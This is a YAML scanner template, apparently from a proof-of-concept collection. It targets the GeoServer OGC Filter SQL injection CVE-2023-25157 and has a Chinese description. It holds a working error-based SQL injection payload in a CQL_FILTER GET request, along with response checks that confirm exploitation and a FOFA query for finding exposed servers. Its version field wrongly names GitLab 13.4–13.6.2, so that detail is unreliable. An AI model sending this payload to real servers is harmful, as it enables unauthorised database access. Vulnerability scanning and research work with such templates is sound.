product: GeoServer
vName: GeoServer OGC Filter SQL注入
type: SQL注入
vID:
  - CVE-2023-25157
level: 2
vDesc: GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。在版本2.22.1和2.21.4及以前，多个OGC表达式中均存在SQL注入漏洞。
version: GitLab 13.4 - 13.6.2
note: ''
search:
  FOFA: app="GeoServer"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/中间件漏洞/GeoServer OGC Filter SQL注入漏洞 CVE-2023-25157.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - <ServiceExceptionReport
              - invalid input
              - syntax for type
            logic: and